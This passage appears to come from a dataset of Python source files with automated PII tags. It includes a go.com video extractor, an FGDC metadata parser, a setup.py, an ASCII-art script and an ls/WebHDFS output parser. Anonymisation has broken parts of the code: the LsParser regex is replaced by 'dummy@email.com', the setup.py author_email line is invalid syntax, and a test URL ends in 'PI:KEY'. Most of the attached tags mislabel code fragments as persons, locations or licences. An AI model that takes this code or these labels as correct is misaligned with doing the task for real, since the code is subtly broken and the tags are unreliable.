'ci4.inputs.so'], ['URL', 'ci4.inputs.so'], ['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'config.se'], ['URL', 'nib.Com'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'config.se'], ['URL', 'ci3.ru'], ['URL', 'ci3.in'], ['URL', 'res.ru'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.pa'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'dict.it']]" +53,"# coding: utf-8 +from __future__ import unicode_literals + +import re + +from .adobepass import AdobePassIE +from ..utils import ( + int_or_none, + determine_ext, + parse_age_limit, + urlencode_postdata, + ExtractorError, +) + + +class GoIE(AdobePassIE): + _SITE_INFO = { + 'abc': { + 'brand': '001', + 'requestor_id': 'ABC', + }, + 'freeform': { + 'brand': '002', + 'requestor_id': 'ABCFamily', + }, + 'watchdisneychannel': { + 'brand': '004', + 'requestor_id': 'Disney', + }, + 'watchdisneyjunior': { + 'brand': '008', + 'requestor_id': 'DisneyJunior', + }, + 'watchdisneyxd': { + 'brand': '009', + 'requestor_id': 'DisneyXD', + } + } + _VALID_URL = r'https?://(?:(?P%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P\w+)|season-\d+/\d+-(?P[^/?#]+))' % '|'.join(_SITE_INFO.keys()) + _TESTS = [{ + 'url': 'http://abc.go.PI:KEY', + 'info_dict': { + 'id': '0_g86w5onx', + 'ext': 'mp4', + 'title': 'Sneak Peek: Language Arts', + 'description': 'PI:KEY', + }, + 'params': { + # m3u8 download + 'skip_download': True, + }, + }, { + 'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601', + 'only_matching': True, + }] + + def _real_extract(self, url): + sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups() + if not video_id: + webpage = self._download_webpage(url, display_id) + video_id = self._search_regex( + # There may be inner quotes, e.g. data-video-id=""'VDKA3609139'"" + # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood + r'data-video-id=[""\']*VDKA(\w+)', webpage, 'video id') + site_info = self._SITE_INFO[sub_domain] + brand = site_info['brand'] + video_data = self._download_json( + 'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id), + video_id)['video'][0] + title = video_data['title'] + + formats = [] + for asset in video_data.get('assets', {}).get('asset', []): + asset_url = asset.get('value') + if not asset_url: + continue + format_id = asset.get('format') + ext = determine_ext(asset_url) + if ext == 'm3u8': + video_type = video_data.get('type') + data = { + 'video_id': video_data['id'], + 'video_type': video_type, + 'brand': brand, + 'device': '001', + } + if video_data.get('accesslevel') == '1': + requestor_id = site_info['requestor_id'] + resource = self._get_mvpd_resource( + requestor_id, title, video_id, None) + auth = self._extract_mvpd_auth( + url, video_id, requestor_id, resource) + data.update({ + 'token': auth, + 'token_type': 'ap', + 'adobe_requestor_id': requestor_id, + }) + else: + self._initialize_geo_bypass(['US']) + entitlement = self._download_json( + 'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json', + video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers()) + errors = entitlement.get('errors', {}).get('errors', []) + if errors: + for error in errors: + if error.get('code') == 1002: + self.raise_geo_restricted( + error['message'], countries=['US']) + error_message = ', '.join([error['message'] for error in errors]) + raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True) + asset_url += '?' + entitlement['uplynkData']['sessionKey'] + formats.extend(self._extract_m3u8_formats( + asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False)) + else: + f = { + 'format_id': format_id, + 'url': asset_url, + 'ext': ext, + } + if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url): + f.update({ + 'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE', + 'preference': 1, + }) + else: + mobj = re.search(r'/(\d+)x(\d+)/', asset_url) + if mobj: + height = int(mobj.group(2)) + f.update({ + 'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height, + 'width': int(mobj.group(1)), + 'height': height, + }) + formats.append(f) + self._sort_formats(formats) + + subtitles = {} + for cc in video_data.get('closedcaption', {}).get('src', []): + cc_url = cc.get('value') + if not cc_url: + continue + ext = determine_ext(cc_url) + if ext == 'xml': + ext = 'ttml' + subtitles.setdefault(cc.get('lang'), []).append({ + 'url': cc_url, + 'ext': ext, + }) + + thumbnails = [] + for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []): + thumbnail_url = thumbnail.get('value') + if not thumbnail_url: + continue + thumbnails.append({ + 'url': thumbnail_url, + 'width': int_or_none(thumbnail.get('width')), + 'height': int_or_none(thumbnail.get('height')), + }) + + return { + 'id': video_id, + 'title': title, + 'description': video_data.get('longdescription') or video_data.get('description'), + 'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000), + 'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')), + 'episode_number': int_or_none(video_data.get('episodenumber')), + 'series': video_data.get('show', {}).get('title'), + 'season_number': int_or_none(video_data.get('season', {}).get('num')), + 'thumbnails': thumbnails, + 'formats': formats, + 'subtitles': subtitles, + } +",6904,"[['MEDICAL_LICENSE', 'ka3335601'], ['URL', ""http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',""], ['LOCATION', '.adobepass'], ['LOCATION', 'video_id, display_id ='], ['URL', 're.ma'], ['URL', 'asset.ge'], ['URL', 'self.ge'], ['URL', 're.se'], ['PERSON', ""mobj = re.search(r'/(\\d+)x(\\d+)/'""], ['URL', 'cc.ge'], ['URL', 'thumbnail.ge'], ['URL', 'thumbnail.ge'], ['PERSON', ""int_or_none(video_data.get('season""], ['URL', 'http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood'], ['URL', ""http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json'""], ['URL', ""https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',""], ['URL', 'INFO.ke'], ['URL', 'data.ge'], ['URL', 'asset.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'entitlement.ge'], ['URL', 'error.ge'], ['URL', 'self.IE'], ['URL', 're.se'], ['URL', 'mobj.gr'], ['URL', 'mobj.gr'], ['URL', 'data.ge'], ['URL', 'subtitles.se'], ['URL', 'cc.ge'], ['URL', 'data.ge'], ['URL', 'thumbnail.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge']]" +54,"# -*- coding: ISO-8859-15 -*- +# ============================================================================= +# Copyright (c) 2010 Tom Kralidis +# +# Authors : Tom Kralidis dummy@email.com +# +# Contact email: dummy@email.com +# ============================================================================= + +"""""" FGDC metadata parser """""" + +from __future__ import (absolute_import, division, print_function) + +from owscapable.etree import etree +from owscapable import util + +class Metadata(object): + """""" Process metadata """""" + def __init__(self, md): + if hasattr(md, 'getroot'): # standalone document + self.xml = etree.tostring(md.getroot()) + else: # part of a larger document + self.xml = etree.tostring(md) + + self.idinfo = Idinfo(md) + self.eainfo = Eainfo(md) + self.distinfo = Distinfo(md) + self.metainfo = Metainfo(md) + + if self.idinfo.datasetid: + self.identifier = self.idinfo.datasetid + +class Idinfo(object): + """""" Process idinfo """""" + def __init__(self, md): + val = md.find('idinfo/datasetid') + self.datasetid = util.testXMLValue(val) + + val = md.find('idinfo/citation') + self.citation = Citation(val) + + val = md.find('idinfo/descript') + if val is not None: + self.descript = Descript(val) + + val = md.find('idinfo/timeperd') + self.timeperd = Timeperd(val) + + val = md.find('idinfo/status') + if val is not None: + self.status = Status(val) + + val = md.find('idinfo/spdom') + if val is not None: + self.spdom = Spdom(val) + + val = md.find('idinfo/keywords') + if val is not None: + self.keywords = Keywords(val) + + val = md.find('idinfo/accconst') + self.accconst = util.testXMLValue(val) + + val = md.find('idinfo/useconst') + self.useconst = util.testXMLValue(val) + + val = md.find('idinfo/ptcontac') + if val is not None: + self.ptcontac = Ptcontac(val) + + val = md.find('idinfo/datacred') + self.datacred = util.testXMLValue(val) + + val = md.find('idinfo/crossref') + self.crossref = Citation(val) + +class Citation(object): + """""" Process citation """""" + def __init__(self, md): + if md is not None: + self.citeinfo = {} + + val = md.find('citeinfo/origin') + self.citeinfo['origin'] = util.testXMLValue(val) + + val = md.find('citeinfo/pubdate') + self.citeinfo['pubdate'] = util.testXMLValue(val) + + val = md.find('citeinfo/title') + self.citeinfo['title'] = util.testXMLValue(val) + + val = md.find('citeinfo/geoform') + self.citeinfo['geoform'] = util.testXMLValue(val) + + val = md.find('citeinfo/pubinfo/pubplace') + self.citeinfo['pubplace'] = util.testXMLValue(val) + + val = md.find('citeinfo/pubinfo/publish') + self.citeinfo['publish'] = util.testXMLValue(val) + + self.citeinfo['onlink'] = [] + for link in md.findall('citeinfo/onlink'): + self.citeinfo['onlink'].append(util.testXMLValue(link)) + +class Descript(object): + """""" Process descript """""" + def __init__(self, md): + val = md.find('abstract') + self.abstract = util.testXMLValue(val) + + val = md.find('purpose') + self.purpose = util.testXMLValue(val) + + val = md.find('supplinf') + self.supplinf = util.testXMLValue(val) + +class Timeperd(object): + """""" Process timeperd """""" + def __init__(self, md): + if md is not None: + val = md.find('current') + self.current = util.testXMLValue(val) + + val = md.find('timeinfo') + if val is not None: + self.timeinfo = Timeinfo(val) + +class Timeinfo(object): + """""" Process timeinfo """""" + def __init__(self, md): + val = md.find('sngdate') + if val is not None: + self.sngdate = Sngdate(val) + + val = md.find('rngdates') + if val is not None: + self.rngdates = Rngdates(val) + +class Sngdate(object): + """""" Process sngdate """""" + def __init__(self, md): + val = md.find('caldate') + self.caldate = util.testXMLValue(val) + val = md.find('time') + self.time = util.testXMLValue(val) + +class Rngdates(object): + """""" Process rngdates """""" + def __init__(self, md): + val = md.find('begdate') + self.begdate = util.testXMLValue(val) + val = md.find('begtime') + self.begtime = util.testXMLValue(val) + val = md.find('enddate') + self.enddate = util.testXMLValue(val) + val = md.find('endtime') + self.endtime = util.testXMLValue(val) + +class Status(object): + """""" Process status """""" + def __init__(self, md): + val = md.find('progress') + self.progress = util.testXMLValue(val) + + val = md.find('update') + self.update = util.testXMLValue(val) + +class Spdom(object): + """""" Process spdom """""" + def __init__(self, md): + val = md.find('bounding/westbc') + self.westbc = util.testXMLValue(val) + + val = md.find('bounding/eastbc') + self.eastbc = util.testXMLValue(val) + + val = md.find('bounding/northbc') + self.northbc = util.testXMLValue(val) + + val = md.find('bounding/southbc') + self.southbc = util.testXMLValue(val) + + if (self.southbc is not None and self.northbc is not None and + self.eastbc is not None and self.westbc is not None): + self.bbox = Bbox(self) + +class Bbox(object): + """""" Generate bbox for spdom (convenience function) """""" + def __init__(self, spdom): + self.minx = spdom.westbc + self.miny = spdom.southbc + self.maxx = spdom.eastbc + self.maxy = spdom.northbc + +class Keywords(object): + """""" Process keywords """""" + def __init__(self, md): + self.theme = [] + self.place = [] + self.temporal = [] + + for i in md.findall('theme'): + theme = {} + val = i.find('themekt') + theme['themekt'] = util.testXMLValue(val) + theme['themekey'] = [] + for j in i.findall('themekey'): + themekey = util.testXMLValue(j) + if themekey is not None: + theme['themekey'].append(themekey) + self.theme.append(theme) + + for i in md.findall('place'): + theme = {} + place = {} + val = i.find('placekt') + theme['placekt'] = util.testXMLValue(val) + theme['placekey'] = [] + for j in i.findall('placekey'): + theme['placekey'].append(util.testXMLValue(j)) + self.place.append(place) + + for i in md.findall('temporal'): + theme = {} + temporal = {} + val = i.find('tempkt') + theme['tempkt'] = util.testXMLValue(val) + theme['tempkey'] = [] + for j in i.findall('tempkey'): + theme['tempkey'].append(util.testXMLValue(j)) + self.temporal.append(temporal) + +class Ptcontac(object): + """""" Process ptcontac """""" + def __init__(self, md): + val = md.find('cntinfo/cntorgp/cntorg') + self.cntorg = util.testXMLValue(val) + + val = md.find('cntinfo/cntorgp/cntper') + self.cntper = util.testXMLValue(val) + + val = md.find('cntinfo/cntpos') + self.cntpos = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/addrtype') + self.addrtype = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/address') + self.address = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/city') + self.city = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/state') + self.state = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/postal') + self.postal = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/country') + self.country = util.testXMLValue(val) + + val = md.find('cntinfo/cntvoice') + self.voice = util.testXMLValue(val) + + val = md.find('cntinfo/cntemail') + self.email = util.testXMLValue(val) + +class Eainfo(object): + """""" Process eainfo """""" + def __init__(self, md): + val = md.find('eainfo/detailed/enttyp/enttypl') + self.enttypl = util.testXMLValue(val) + + val = md.find('eainfo/detailed/enttyp/enttypd') + self.enttypd = util.testXMLValue(val) + + val = md.find('eainfo/detailed/enttyp/enttypds') + self.enttypds = util.testXMLValue(val) + + self.attr = [] + for i in md.findall('eainfo/detailed/attr'): + attr = {} + val = i.find('attrlabl') + attr['attrlabl'] = util.testXMLValue(val) + + val = i.find('attrdef') + attr['attrdef'] = util.testXMLValue(val) + + val = i.find('attrdefs') + attr['attrdefs'] = util.testXMLValue(val) + + val = i.find('attrdomv/udom') + attr['udom'] = util.testXMLValue(val) + + self.attr.append(attr) + +class Distinfo(object): + """""" Process distinfo """""" + def __init__(self, md): + val = md.find('distinfo') + if val is not None: + val2 = val.find('stdorder') + if val2 is not None: + self.stdorder = {'digform': []} + for link in val2.findall('digform'): + digform = {} + digform['name'] = util.testXMLValue(link.find('digtinfo/formname')) + digform['url'] = util.testXMLValue(link.find('digtopt/onlinopt/computer/networka/networkr/')) + self.stdorder['digform'].append(digform) + +class Metainfo(object): + """""" Process metainfo """""" + def __init__(self, md): + val = md.find('metainfo/metd') + self.metd = util.testXMLValue(val) + + val = md.find('metainfo/metrd') + self.metrd = util.testXMLValue(val) + + val = md.find('metainfo/metc') + if val is not None: + self.metc = Ptcontac(val) + + val = md.find('metainfo/metstdn') + self.metstdn = util.testXMLValue(val) + + val = md.find('metainfo/metstdv') + self.metstdv = util.testXMLValue(val) + + val = md.find('metainfo/metac') + self.metac = util.testXMLValue(val) + + val = md.find('metainfo/metuc') + self.metuc = util.testXMLValue(val) +",10441,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Tom Kralidis'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'md):'], ['PERSON', 'md):\n val'], ['PERSON', 'self.timeperd = Timeperd(val'], ['PERSON', 'md):\n '], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n '], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('sngdate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('caldate""], ['PERSON', 'self.time = util.testXMLValue(val'], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('begdate""], ['PERSON', ""md.find('begtime""], ['PERSON', ""md.find('enddate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('update""], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'self.enttypd ='], ['PERSON', 'md):\n val'], ['URL', 'val2.fi'], ['URL', 'link.fi'], ['URL', 'link.fi'], ['PERSON', 'md):\n val'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'owscapable.et'], ['URL', 'etree.to'], ['URL', 'md.ge'], ['URL', 'etree.to'], ['URL', 'self.id'], ['URL', 'self.me'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.de'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ke'], ['URL', 'md.fi'], ['URL', 'self.ac'], ['URL', 'md.fi'], ['URL', 'self.us'], ['URL', 'md.fi'], ['URL', 'self.pt'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.cr'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.su'], ['URL', 'md.fi'], ['URL', 'self.cu'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.sn'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ca'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.pro'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.no'], ['URL', 'md.fi'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.no'], ['URL', 'self.bb'], ['URL', 'spdom.so'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'spdom.no'], ['URL', 'self.th'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.th'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.co'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'val.fi'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me']]" +55,"import sys +from setuptools import setup + +tests_require = [""nose>=1.0""] +if sys.version_info < (3,0): + tests_require = [""nose>=1.0"", ""mock""] + +setup( + name=""unitils"", + version=""0.1.2"", + author=""iLoveTux"", + dummy@email.com"", + description=""Cross platform utilities I have found to be incredibly useful"", + license=""GPLv3"", + keywords=""utility tools cli"", + url=""http://github.com/ilovetux/unitils"", + packages=['unitils'], + install_requires=[""colorama""], + entry_points={ + ""console_scripts"": [ + ""cat.py=unitils.cli:cat"", + ""cp.py=unitils.cli:cp"", + ""find.py=unitils.cli:find"", + ""grep.py=unitils.cli:grep"", + ""head.py=unitils.cli:head"", + ""ls.py=unitils.cli:ls"", + ""mv.py=unitils.cli:mv"", + ""watch.py=unitils.cli:watch"", + ""wc.py=unitils.cli:wc"", + ""which.py=unitils.cli:which"", + ] + }, + test_suite=""nose.collector"", + tests_require=tests_require, + classifiers=[ + ""Development Status :: 4 - Beta"", + ""Topic :: Utilities"", + ""License :: OSI Approved :: GNU General Public License v3 (GPLv3)"", + ], +) +",1171,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'GPLv3'], ['URL', 'http://github.com/ilovetux/unitils"",'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'sys.ve'], ['URL', 'email.com'], ['URL', 'cat.py'], ['URL', 'unitils.cl'], ['URL', 'cp.py'], ['URL', 'unitils.cl'], ['URL', 'find.py'], ['URL', 'unitils.cl'], ['URL', 'grep.py'], ['URL', 'unitils.cl'], ['URL', 'head.py'], ['URL', 'unitils.cl'], ['URL', 'ls.py'], ['URL', 'unitils.cl'], ['URL', 'mv.py'], ['URL', 'unitils.cl'], ['URL', 'watch.py'], ['URL', 'unitils.cl'], ['URL', 'wc.py'], ['URL', 'unitils.cl'], ['URL', 'which.py'], ['URL', 'unitils.cl'], ['URL', 'nose.co']]" +56,"#!/usr/bin/env python + +# asciinator.py +# +# Copyright 2014 Christian Diener dummy@email.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, +# MA 02110-1301, USA. +# +# + +from __future__ import print_function # for python2 compat + +import sys; +from PIL import Image; +import numpy as np + +# ascii chars sorted by ""density"" +chars = np.asarray(list(' .,:;irsXA253hMHGS#9B&@')) + +# check command line arguments +if len(sys.argv) != 4: + print( 'Usage: asciinator.py image scale factor' ) + sys.exit() + +# set basic program parameters +# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor +f, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0 + +# open, scale and normalize image by pixel intensities +img = Image.open(f) +S = (int(img.size[0]*SC*WCF), int(img.size[1]*SC)) +img = np.sum( np.asarray(img.resize(S), dtype=""float""), axis=2) +img -= img.min() +img = (1.0 - img/img.max())**GCF*(chars.size-1) + +# Assemble and print ascii art +print( ""\n"".join(("""".join(r) for r in chars[img.astype(int)]))) +print() +",1717,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Christian Diener'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['LOCATION', 'SC'], ['LOCATION', 'SC'], ['URL', 'asciinator.py'], ['URL', 'email.com'], ['URL', 'np.as'], ['URL', 'sys.ar'], ['URL', 'asciinator.py'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'img.si'], ['URL', 'img.si'], ['URL', 'np.su'], ['URL', 'np.as'], ['URL', 'img.re'], ['URL', 'img.ma'], ['URL', 'chars.si'], ['URL', 'img.as']]" +57,"#!/usr/bin/env python +# -*- coding: UTF-8 -*- + +import datetime +from time import strptime +import re +import os +import json + +class FileStatus(object): + def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None): + self.path = path + + self.rights = rights + self.nbFiles = nbFiles + self.owner = owner + self.group = group + + self.size = size + + self.date = date + self.relpath = relpath + + def __eq__(self, other): + return (self.path == other.path and self.rights == other.rights and + self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and + self.size == other.size and self.date == other.date) + + def is_dir(self): + return self.rights.startswith(""d"") + + def __str__(self): + return self.to_str(0, 0, 0, 0, 0, 0, 0) + + def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with): + if self.is_dir: + nb_files = ""-"" + else: + nb_files = str(self.nbFiles) + result = ""%s %s %s %s %s %s %s"" % (self.rights.ljust(rights_width), + nb_files.ljust(nbFiles_width), + self.owner.ljust(owner_width), + self.group.ljust(group_width), + str(self.size).ljust(size_width), + self.date.strftime(""%Y-%M-%d %H:%M"").ljust(date_width), + self.path.ljust(path_with)) + return result.encode(""utf-8"") + +def get_file_statuses_pretty_print(file_statuses): + rights_width = 0 + nb_files_width = 0 + owner_width = 0 + group_width = 0 + size_width = 0 + date_width = 0 + path_width = 0 + + if len(file_statuses) != 0: + rights_width = max([len(fs.rights) for fs in file_statuses]) + nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses]) + owner_width = max([len(fs.owner) for fs in file_statuses]) + group_width = max([len(fs.group) for fs in file_statuses]) + size_width = max([len(str(fs.size)) for fs in file_statuses]) + date_width = max([len(fs.date.strftime(""%Y-%M-%d %H:%M"")) for fs in file_statuses]) + path_width = max([len(fs.path) for fs in file_statuses]) + + result = [] + for file_status in file_statuses: + result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width)) + return ""\n"".join(result) + +class LsParser(object): + def __init__(self): + pass + + def parse_line(self, line): + regex = ""^(dummy@email.com)$"" + + m = re.match(regex, line, re.UNICODE) + if m is None: + return None + + rights = m.group(1) + nbFiles = int(m.group(2)) + owner = m.group(3) + group = m.group(4) + size = int(m.group(5)) + + day = int(m.group(6)) + month = m.group(7) + try: + month = strptime(month, '%b').tm_mon + except: + month = [u""jan"", u""fév"", u""mar"", u""avr"", u""mai"", u""jui"", u""juil"", u""aoû"", u""sep"", u""oct"", u""nov"", u""déc""].index(month) + 1 + + try: + year = int(m.group(8)) + except: + year = datetime.datetime.now().year + filename = m.group(9) + + date = datetime.date(year, month, day) + + return FileStatus(filename, rights, nbFiles, owner, group, size, date) + + def parse(self, output): + result = [self.parse_line(line) for line in output.split(""\n"")] + return [p for p in result if p is not None] + +class WebHdfsParser(object): + def __init__(self, path): + self.path = path + + def permissions_to_unix_name(self, is_dir, rights): + is_dir_prefix = 'd' if is_dir else '-' + sticky = False + if len(rights) == 4 and rights[0] == '1': + sticky = True + rights = rights[1:] + dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'} + result = is_dir_prefix + ''.join(dic[x] for x in rights) + if sticky: + result = result[:-1] + ""t"" + return result + + def parse_status(self, status): + relpath = status[""pathSuffix""] + path = os.path.join(self.path, relpath) + nbFiles = 0 + size = status[""length""] + owner = status[""owner""] + group = status[""group""] + is_dir = status[""type""] == ""DIRECTORY"" + right_digits = status[""permission""] + rights = self.permissions_to_unix_name(is_dir, right_digits) + + parsed_date = datetime.datetime.utcfromtimestamp(int(status[""modificationTime""])/1000) + + date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute) + + return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath) + + + def parse(self, output): + try: + j = json.loads(output) + except: + print output + return [] + if ""FileStatuses"" not in j or ""FileStatus"" not in j[""FileStatuses""]: + print j + return [] + statuses = j[""FileStatuses""][""FileStatus""] + result = [] + for status in statuses: + result.append(self.parse_status(status)) + return result +",5405,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'other.nbFiles'], ['PERSON', 'self.owner == other.owner'], ['NRP', 'self.rights.ljust(rights_width'], ['LOCATION', 'self.date.strftime(""%Y-%M-%d'], ['NRP', 'owner_width'], ['LOCATION', 'owner_width'], ['DATE_TIME', 'month'], ['DATE_TIME', 'parsed_date.day'], ['URL', 'self.pa'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.gr'], ['URL', 'other.gr'], ['URL', 'self.si'], ['URL', 'other.si'], ['URL', 'self.rights.st'], ['URL', 'self.to'], ['URL', 'self.is'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.date.st'], ['URL', 'self.pa'], ['URL', 'fs.gr'], ['URL', 'fs.si'], ['URL', 'fs.date.st'], ['URL', 'fs.pa'], ['URL', 'status.to'], ['URL', 'email.com'], ['URL', 're.ma'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 